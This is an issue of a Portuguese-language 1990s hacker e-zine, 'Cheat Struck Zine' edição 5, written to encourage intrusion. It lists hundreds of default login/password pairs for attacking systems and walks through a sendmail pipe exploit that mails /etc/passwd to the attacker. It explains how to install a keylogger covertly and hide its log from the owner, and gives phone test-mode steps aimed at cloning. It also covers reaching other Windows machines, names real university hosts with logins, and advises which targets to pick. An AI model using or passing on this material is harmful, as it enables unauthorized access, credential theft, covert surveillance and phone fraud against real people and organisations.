CSZ - Cheat Struck Zine edição 5 por: Cheat Struck ***************************************************************************** Indice: 1. Introdução 2. Dicas Hacks 3. Bugs 4. VIRII 5. Programas Hackers 6. Hacking para iniciantes 7. Phreaking 8. Invasão de privacidade 9. Hack, the Art 10. Preview ***************************************************************************** 1. Introdução Estamos ai de novo. Já estamos na edição 5, quer dizer, eu estou né, pq eu é que escrevo todo o zine sózinho e por isso é que ele não é tão longo quanto os outros que circulam pela inet. Mas eu acho que apartir daqui as edições irão ficar mais "gordas". Para se ter uma ideia, a seção Dicas Hacks, que nas outras edições não passa- vam de 20 linhas, nessa edição só ela tem... a sei lá não vou contar, mas que ela ta "cheia" tá, deve ter mais de 200 linhas só de passwords defaults dos mais variados sistemas encontrados na inet. Tenho que confesar que tirei coisas de outros zines. Mas os zines que eu ando "copiando" coisas são zines americanos e espanois que você raramente irá encontrar por ai. E mesmo assim a maioria das seções, estão coisas que eu mesmo fiz e esperimentei. Aki vc também irá achar a segunda parte do tutorial de ASSEMBLER, eu tenho que comentar q não fiz nenhum curso especializado nessa linguagem, apenas fui vendo as fontes de alguns programas e virus e fui testando, por isso não garanto que a informação contida esteja 100% certa mas até agora, não tive problemas com meus progs. Outra coisa... É precisso ter muita paciencia para fazer um zine desses sabiam. A um pouco eu estava fazendo um texto para a nova seção "Hack- ing para iniciantes", estava escrevendo o txt com o edit do DOS quando...PUM! Abriu mais uma daquelas janelas escrotas do windows, sabe akelas telas azuis que indicam um erro(OOB). É... por isso eu aconselho aos BEGINERS que querem ser hackers que instalem logo um UNIX para mim não ter que continuar a digi- tar esses txts com produtos da microsoft. A não comprem o WIN 98, a primeira vista ele pode parecer bom e interesante, mas aos poucos vão aparecendo os bugs. ***************************************************************************** 2. Dicas Hacks Aki vai uma lista de contas padrões de Sistemas Operacionais. Elas podem ser muito uteis nos atakes a redes que usam esses SOs com suas próprias contas padrões... As contas estão no formato login, senha. ### AIX ### guest guest ### AS/400 ### qsecofr qsecofr qsysopr qsysopr qpgmr qpgmr ibm password ibm 2222 ibm service qsecofr 1111111 qsecofr 2222222 qsvr qsvr secofr secofr ### DECserver ### ACCESS SYSTEM ### HP MPE-XL ### HELLO MANAGER.SYS HELLO MGR.SYS HELLO FIELD.SUPPORT HELLO FIELD.HPUNSUP HELLO FIELD.SUPPORT HELLO FIELD.HP HELLO OP.OPERATOR MGR CAROLIAN MGR CCC MGR CNAS MGR CONV MGR COGNOS OPERATOR COGNOS MANAGER COGNOS OPERATOR DISC MGR HPDESK MGR HPWORD FIELD HPWORD MGR HPOFFICE SPOOLMAN HPOFFICE ADVMAIL HPOFFICE MAIL HPOFFICE WP HPOFFICE MANAGER HPOFFICE MGR HPONLY FIELD HPP187 MGR HPP187 MGR HPP189 MGR HPP196 MGR INTX3 MGR ITF3000 MANAGER ITF3000 MAIL MAIL MGR NETBASE MGR REGO MGR RJE MGR ROBELLE MANAGER SECURITY MGR SECURITY FIELD SERVICE MANAGER SYS MGR SYS PCUSER SYS RSBCMON SYS OPERATOR SYS OPERATOR SYSTEM FIELD SUPPORT OPERATOR SUPPORT MANAGER TCH MAIL TELESUP MANAGER TELESUP MGR TELESUP SYS TELESUP MGE VESOFT MGE VESOFT MGR WORD MGR XLSERVER ### Major BBS ### Sysop Sysop ### PICK O/S ### DSA DS DESQUETOP PHANTOM ### Prolog ### PBX PBX NETWORK NETWORK NETOP ### Rolm ### op op op operator su super admin pwp eng engineer ### PhoneMail Defaults ### sysadmin sysadmin tech tech poll tech ### RSX ### SYSTEM SYSTEM (Username SYSTEM, Password SYSTEM) 1,1 system (Directory [1,1] Password SYSTEM) BATCH BATCH (Username SYSTEM, Password SYSTEM) SYSTEM MANAGER USER USER MICRO RSX ### System 75 ### bcim bcimpw bciim bciimpw bcms bcmspw, bcms bcnas bcnspw blue bluepw browse looker, browsepw craft crftpw, craftpw, crack cust custpw enquiry enquirypw field support inads indspw, inadspw, inads init initpw kraft kraftpw locate locatepw maint maintpw, rwmaint nms nmspw rcust rcustpw support supportpw tech field ### Taco Bell ### rgm rollout tacobell ### Verifone Junior 2.05 ### 166816 ### VMS ### field service systest utep ### UNIX ### root root root system sys sys sys system daemon daemon uucp uucp tty tty test test unix unix unix test bin bin adm adm adm admin admin adm admin admin sysman sysman sysman sys sysman system sysadmin sysadmin sysadmin sys sysadmin system sysadmin admin sysadmin adm who who learn learn uuhost uuhost guest guest host host nuucp nuucp rje rje games games games player sysop sysop root sysop demo demo ### PRIME ### PRIME PRIME PRIME PRIMOS PRIMOS PRIMOS PRIMOS PRIME PRIMOS_CS PRIME PRIMOS_CS PRIMOS PRIMENET PRIMENET SYSTEM SYSTEM SYSTEM PRIME SYSTEM PRIMOS NETLINK NETLINK TEST TEST GUEST GUEST GUEST1 GUEST ### DEC10 ### 1,2: SYSLIB or OPERATOR or MANAGER 2,7: MAINTAIN 5,30: GAMES ###IRIS ### MANAGER BOSS SOFTWARE DEMO PDP8 PDP11 ACCOUNTING ***************************************************************************** 3. Bugs Agora é pra valer... Ao contrario das primeiras edições, onde eu mos- trava bugs infames de Windows 95, NT e DOS, agora nessa seção irá sair apenas bugs que poderão ser muito uteis para invasão a servidores. O este bugfaz é permitir que enviando um comando na linha do sendmail possa conseguir que o fichero de passwords seja enviado para a sua mailbox. (Por isso é conveniente usar um mail anonimo para não ser achado) Sistemas: Unix's em geral, espacialmente AIX e SUNOS Versões: Sendmail, versões anteriores a 5.57 Descrição: Bug de sendmail Exemplo: em unix ou linux saqland % telnet vitima.com 25 Trying 128.128.128.1... Connected to vitima.com Escape character is '^]'. 220 vitima.com Sendmail 5.55 ready at Saturday, 6 Nov 93 18:04 mail from: "|/bin/mail tua_direção@de_mail.com < /etc/passwd" 250 "|/bin/mail tua_direção@de_mail.com < /etc/passwd"... Sender ok rcpt to: qualquerum 550 qualquerum... User unknown data 354 Enter mail, end with "." on a line by itself . 250 Mail accepted quit Connection closed by foreign host. saqland % Exemplo: Conexão via DOS ou Windows Com um programa de telnet conecte-se a este url -> victima.com:25 ou se puder configurar nos menus, configure-o para que a conexão seja feita pela porta 25, que é a do sendmail. 220 vitima.com Sendmail 5.55 ready at Saturday, 6 Nov 93 18:04 mail from: "|/bin/mail tua_direção@de_mail.com < /etc/passwd" 250 "|/bin/mail tua_direção@de_mail.com < /etc/passwd"... Sender ok rcpt to: qualquerum 550 qualquerum... User unknown data 354 Enter mail, end with "." on a line by itself . 250 Mail accepted quit Notas: -vitima.com = url do sistema a ser hackeado. -saqland = seu url. -o que aparece com um numero antes são mensagens de sua vitima, o resto é o que vc tem que escrever. -Aprenda a usar bem o programa de telnet, porque é o que vc mais vai usar na hora de hackear. ***************************************************************************** 4. VIRII Aki vai a segunda parte do tutorial de assembler escrita por mim. *****Tutorial de ASSEMBLER parte2***** ##### Colocando labels ##### Coloque o nome do label seguido por :(dois pontos). Exemplo: inicio: meio: fim: ##### Comando JMP ##### Pula para um outro label. Exemplo: parte1: add AX,0001 parte2: jmp parte1 ##### Comando DEC ##### Diminui 0001 de um conjunto. Exemplo: MOV AX, 0004 ; AX = 0004 DEC AX ; 0004(AX) - 0001 = 0003 DEC AX ; 0003(AX) - 0001 = 0002 DEC AX ; 0002(AX) - 0001 = 0001 ##### Comando INC ##### Adiciona 0001 em um conjunto. Exemplo: MOV AX, 0001 ; AX = 0001 INC AX ; 0001(AX) + 0001 = 0002 INC AX ; 0002(AX) + 0001 = 0003 INC AX ; 0003(AX) + 0001 = 0004 ##### Conjunto IP ##### IP não é o protocolo usado pelo assembler, não. IP é a linha na qual o assembler está lendo. Ex: 1565:0100 ADD AX, 0001 ^^^^--IP 1565:0103 JMP 0100 ^^^^--IP--^^^^ ***************************************************************************** 5. Programas Hackers *Nome do produto: KeyCopy Version 1.01 *Nome interno: KeyCopy *Nome do Arquivo: KEYCOPY.COM *Nome do Autor: Christopher E BoVee *Marcas Registradas: < *Idioma: Inglês(E.U.A) *Versão do produto: 1.01 *CopyRight: (c) Copyright Christopher E BoVee 1990 *Comentarios: Use o KEYCOPY para pegar qualquer coisa ou qualquer ativasão do teclado no seu computador. Isso inclue quando estiver usando o Wordperfect 5.0, Multimate,Norton Editor. Keycopy copia todo keystroke para um buffer na area de programa do KEYCOPY. Bem, o buffer suporta 200 keystrokes na memoria, keycopy copiará o buffer para um file com a data e hora do acesso. O file padrão é c:\keycopy. Você pode especificar o drive, subdiretorio e nome do file por haver o file parametro chamado KC.PRM no subdiretorio onde o KEYCOPY foi executado. O computador poderá resetar, e executar o Keycopy denovo. Keycopy poderá ser testado e usado com DOS 3.3 ou 4.0 com mais de 3k de memoria. Como usar o Keycopy: Copie-o para o HD e depois digite KEYCOPY no dir em que ele foi copiado. Pronto, ele está instalado e tudo o que for digitado no DOS ele copiará para o file "c:\keycopy". Para que o dono do computador não disconfiar que o keycopy foi instalado, delete-o que ele continuará ins- talado. Outra coisa: Se o file c:\keycopy começar a ficar muito grande, dele- te-o tb que ele será criado novamente ao digitarem alguma coisa no DOS. Você também pode usar o atributo invisivel para esse file, para que não descubram que ele foi instalado. ***************************************************************************** 6. Hacking para iniciantes Seção nova no zine... Aki estarão varias dicas para quem está come- çando a hackear, como quais os lugares ideais para começarem a hackear e uma lista de termos usados no underworld. Eu estava digitando uma lista de termos usados em redes por hackers e administradores de rede mas ai abriu um OOB bem na hora deu digitar o "ç". Por isso nesta edição vou colocar apenas os tipos de sistemas que vc pode e ñ pode hackear, quer dizer, vc pode fazer o que quizer mas as que eu recomendo são as seguintes: * SISTEMAS QUE VOCÊ NÃO DEVE HACKEAR: -Sistemas de grandes empresas que não poupariam gastos para te encontrar. -Sistemas governamentais que são muito poderosos. -Sistemas de companias telefonicas. Que são mais poderosos que os do governo. -Sistemas que tenham alguma relação contigo. Para não ser identificado. -Sistemas de empresas de segurança informatica. Saben mais que vc. -Sistemas da policia. Não convém hackea-los. -Sistemas de serviços secretos. Nos EUA é um esporte nacional tentar hackear o FBI e o pentagono, porém é bastante arriscado. * SISTEMAS QUE VOCÊ DEVE HACKEAR: -Sites Warez. -Provedores de pornografia infantil. -Servidores de grupos terroristas ou fanaticos. -Sistemas de governos não democraticos. -Sistemas de traficantes de informação. Note que os sistemas que vc deve hackear não podem entrar em contato com a policia ou qualquer outro departamento por também estarem cometendo um crime. Tá, agora eu vou parar por aki pois já to cheio desses bugs da micro- soft e se abrir outro OOB agora eu vou me encher e vai ser dificil eu conti- nuar com o zine em DOS/Windows. ***************************************************************************** 7. Phreaking Programando Celulares... Nesta edição vamos aprender a progamar celu- lares motorola, para que talvéz nos consigamos clonear celulares, já que numa edição passada eu não consegui colocar nada na materia "cloneando celulares". Nessa edição eu tinha um monte de coisas para colocar sobre programa- ção de celulares mas aí ficou muito cheio então decidi colocar apenas a pro- gramação em TEST MODE. ### TEST MODE ### Tem Muita coisa para colocar nessa seção, por isso vamos ficar apenas com a parte pratica dos modelos mais atuais. * PHONES NEWER 95xx Muitos phones novos não requerem rudimentos. Se o numero da versão do seu software é 9526 (Eu acho) ou newer, digite isso: FCN + 0 + 0 + * + * + 8 3 7 8 6 6 3 3 + STO * Outros modelos Retire a bateria, localize 3 conectadores de metal... Coloque um pedaçinho de papel de aluminio no conector do meio. Recoloque a bateria e ligue-o. ### Programando TEST MODE ### Após feito isso irá aparecer umas coisas estranhas, então digite: 32# para apagar tudo; 38# para mostrar o conteudo do ESN; 55# para entrar na programação do test mode; Digite 55# para entrar no TEST MODE. Ao entrar no TEST MODE aparecerá na telinha todo o seu status(Canal, RSSI, TX, e outras coisas que você não entende)... Ao total são 99 comandos que podem ser usados no TEST MODE mas iremos com calma, então como hoje a seção phreaking está muito grande, aí vai apenas 10 comandos como introdução: 00# sem função 01# Reseta o celular, esse comando tem o mesmo efeito que o 13#. 02# Mostra o status corrente do Telephone. O status pode ser encontrado da seguinte forma: AAA BBB Onde: AAA = Numero do canal(decimal) e BBB = leitura RSSI do canal CDEFGHI Onde: C = frequencia SAT(0=5970, 1=6000, 2=6030, 3=sem channel lock) D = Carrier (0=off, 1=on) E = Signalling tone (0=off, 1=on) F = nível da Forsa (0 a 7) G = Channel mode (0=voice channel, 1=control channel) H = Receive audio mute (0=unmuted, 1=muted) I = Transmit audio mute (0=unmuted, 1=muted) Aperte * para ver a próxima configuração e # para sair. 03# Reseta Automaticamente o Timer. 04# Inicia o Telephone com as condições padrões Standard: Carrier Off Power Level 0 Receiver Audio Muted Transmit Audio Muted Signalling Tone Off SAT Off Resetting of Watch-Dog Timer Enabled DTMF and Audio Tones Off Audio Path Set to Speaker 05# TX Carrier On (Tecla Transmisora) 06# TX Carrier Off 07# RX Audio Off (Mute Receiver Audio) 08# RX Audio On (Unmute Receiver Audio) 09# TX Audio Off 10# TX Audio On ***************************************************************************** 8. Invasão de privacidade É um meio de invasão muito conhecido no underworld. Qualquer um que tenha um UNIX está protegido mas os usuários de Windows... Assim, entre num programa de IRC e descubra o IP ou Host de alguém, Abra o programa de telnet e conecte-se com o IP/Host, se for um sistema UNIX você deverá digitar um login valido para aquele sistema, porém se for um WIN é só entrar e fazer a festa!!! Para obter uma lista de IPs que você tem acesso você deve configurar o WINS e o LMHOSTS. Com isso tb é possivel você entrar em outros sistemas WIN mesmo usando o Windows. Para configurar o WINS entre no painel de controle/rede e veja as propriedades do protocolo TCP/IP. Aí configure o servidor WINS primario e secundario. Se você não conhece nenhum coloque os seguintes 204.118.34.6 e 204.118.34.11. Já o LMHOSTS é mais fácil, crie um file no c:\Windows chamado LMHOSTS Atenção! o file deve se chamar apenas LMHOSTS e não lmhosts.txt Agora para ver a lista de sistems que vc tem acesso digite NBTSTAT -N e aparecerá uma lista de IPs e HOSTs que vc tem acesso. Você então pode usar o ícone Ambiente de Rede e mapear os sistemas ou usar Telnet. O problema do telnet é que nem sempre os sistemas de usuarios usam as mesmas portas para acesso a telnet, 23 é a porta padrão e é até capaz que vc encontre alguns sistemas de users que a usem. Mas se não va testando com outras portas. Aki vai uma lista de portas mais usadas nos seguintes servisos: FTP(21) POP3(110) WWW ou HTTP(80) IRC(6666, 6667, 6668, 6669) SOCKS(1080) TELNET(23) SMTP(25) ***************************************************************************** 9. Hack, the Art Hackear Universidades é uma das coisas mais feitas por hackers que tão se lichando pra vida. O melhor meio de se hackear universidades é via telnet. Vc pode encontrar varios endereços de universidades e seus logins root. Eu já dei uma pesquisada e encontrei os seguintes endereços e contas para duas das maiores universidades daqui do sul: * PUCRS url : aleph.pucrs.br login : guest * UFRGS url : asterix.ufrgs.br login : sabibib Não lembro a fonte dessas contas mas estavam juntas com urls e logins de outros servisos telnet que não funcionam mais. ***************************************************************************** 10. Preview Na próxima edição... * Phreaking 'Continuação dos comandos para o TEST MODE * Hacking para iniciantes 'Grossário de termos usados por hackers * VIRII 'Continuação do tutorial de ASSEMBLER * Bugs 'A seção bugs vem com toda a forsa Futuras publicações... * Lista de provedores e endereços ftp do BRASIL. * Lista de pesquisa Hack versão 2.00.00 ***************************************************************************** By Cheat Struck